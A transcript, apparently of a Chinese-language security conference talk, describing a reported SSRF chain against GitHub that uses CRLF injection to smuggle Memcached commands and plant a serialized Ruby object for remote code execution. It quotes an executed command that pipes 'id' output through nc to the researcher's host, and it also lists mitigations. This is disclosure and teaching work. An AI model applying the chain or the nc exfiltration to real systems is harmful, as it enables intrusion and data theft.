所以我们可以让攻击去伪造一个协议，利用这些 CRLF injection 去伪造其他的协议，达成 protocol smuggling。 我们可以用第一个 SSRF 去串第二个 SSRF， 然后利用第二个 SSRF 的 CRLF injection 去达到伪造任意 protocol 的一个目的。好，那下一个问题是，我们可以伪造协议，那我们要伪造什么协议呢？这里我把目标转为 Redis 或是 Main Cache， 我花了很多时间在找，如果我可以控制 Redis 或是 Main Cache 的话，我可以去触发什么样的漏洞。那在看 code 的时候，其实一直找不到可以触发什么样比较严重的漏洞，但是我一直对一件事情很好奇，为什么 GitHub 可以在 Main Cache 中存 Ruby 的 Object？ Object 是一个非常抽象的概念，但是 main cache 中存在却是一个字串。那经过一番研究，我发现 GitHub 用了一个 gen 去处理所有跟 main cache 沟通的一些事情，而这个 gen 会用 mashup 这个东西去把资料给包起来。好，所以我们的目标就很明确，就是大家应该都知道 mashup 是一个很危险的东西。那所以说我们可以用我们的 SSRF execution chain 去触发 Graphite 上面的 CRLF injection，然后利用这个 CRLF injection 去伪造 main cache 的协议，将我们的恶意 Ruby object 存在 main cache 中。那 等到下一次 GitHub 在存取 cache 的时候，这个 Ruby gen 会自动去做到反序列化。那在反序列化的途中，其实就可以触发我们的远端代码执行。那这边是最终的 payload， 它总共有四个部分。红色部分是第一个绕过 webhook 的一个 SSRF。那串着蓝色的部分，蓝色的部分是 Graphite 上面的第二个 SSRF。 好，第三个是黄色，第三个黄色字的地方是我们所去做 protocol smuggling 所伪造的一个 main cache 的 protocol。 好，你可以看到这里使用 %0D %0A 去达到做 protocol smuggling。 那这里储存了一笔 Ruby mashup 的资料，也就是最后的反白深蓝色的部分。那这里是 mashup 过后的 Ruby object， 这里反虚化了一些 Rails 内建的一些基本 class 去达到任意代码执行的一个效果。好，你可以看到在这里我们所执行的指令是 id pipe nc orange.tw， 就是把它的使用者的 id 传到我们的机器上面。好，那这个漏洞回报给 GitHub 之后拿了12500美金。那我相信这样的手法，从 SSRF execution chain 到 protocol smuggling 再到远端代码执行，我这个案例应该在世界上不是第一也是第二，至少我看到的是这个样子啦。好，那因为我们没有时间，我们就不看 demo 了，不过这个投影片大家回去可以看一下。好， mitigations 就是怎么去预防这些东西呢？那我们这里从两个观点来看。第一个，如果是从软体层的话，你要用唯一的 IP， 千万不要去重复 reuse 到使用者所提供给你的 IP。 那从网络层的话，你可以用一些 firewall 或是 network 的一些 policy 去阻挡 intranet 一个 traffic。 那这里有一些用来做 SSRF 防御的一些 library， 像是 safecurl 或是 advocate， 这两个东西可以去做使用。
好，总结，我们这里介绍一个新的方法去绕过既有的 SSRF 保护，例如说利用 URL parser 解析的不同，以及 URL parser 对于 IDNA 标准的不同去达到绕过。那这里介绍之后介绍一个新的 protocol smuggling 的手法，那我们展示了如何利用 Linux glibc 的特性以及 Node.js 对 Unicode 处理的问题去绕过防火墙，在合法的 HTTP 中迁入恶意的危险代码去攻击内网服务。那最后我们给了一些案例分享，像是 Python、 MyBB 以及 GitHub。 好， Acknowledge 就谢谢这些人。那我的演讲差不多到这边结束，那如果你有更进一步的问题，你可以等一下发问，我觉得时间不多，你可以等一下到前面来找我。那或是害羞的话，你可以就是这边我的联系方式 orange@changelook.org， 或是用 Twitter follow 我。那谢谢大家，我的演讲就到此结束。好，感谢 Orange 精彩的演讲，我相信大家都觉得意犹未尽，还有人在上面说想要加时哦。不过我想今天时间有限，所以请各位可以在私下找 Orange 交流。好，感谢 Orange。那等一下再占有点时间呢，我们会请 Dylan 然后来说明一下备局题目，可能有一些提示想要更新一下。